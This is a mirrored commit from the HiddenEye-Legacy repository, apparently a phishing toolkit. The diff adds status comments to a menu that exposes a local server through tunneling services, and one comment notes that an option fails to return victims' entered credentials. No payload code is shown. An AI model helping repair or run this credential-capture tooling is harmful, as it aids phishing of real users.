mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Added descriptive comments about my work
This commit is contained in:
parent
d41ca28234
commit
69e643d970
|
@ -31,10 +31,10 @@ def server_selection(port): # Question where user must select server
|
|||
server_runner.start_ngrok(port) # FIXED
|
||||
elif choice == '2':
|
||||
run_command('clear')
|
||||
server_runner.start_serveo(port)
|
||||
server_runner.start_serveo(port) # ALMOST FIXED
|
||||
elif choice == '3':
|
||||
run_command('clear')
|
||||
server_runner.start_localxpose(port)
|
||||
server_runner.start_localxpose(port) # DOESN'T GET ENTERED CREDENTIALS BACK
|
||||
elif choice == '4':
|
||||
run_command('clear')
|
||||
server_runner.start_localtunnel(port, True)
|
||||
|
|
Loading…
Reference in New Issue
Block a user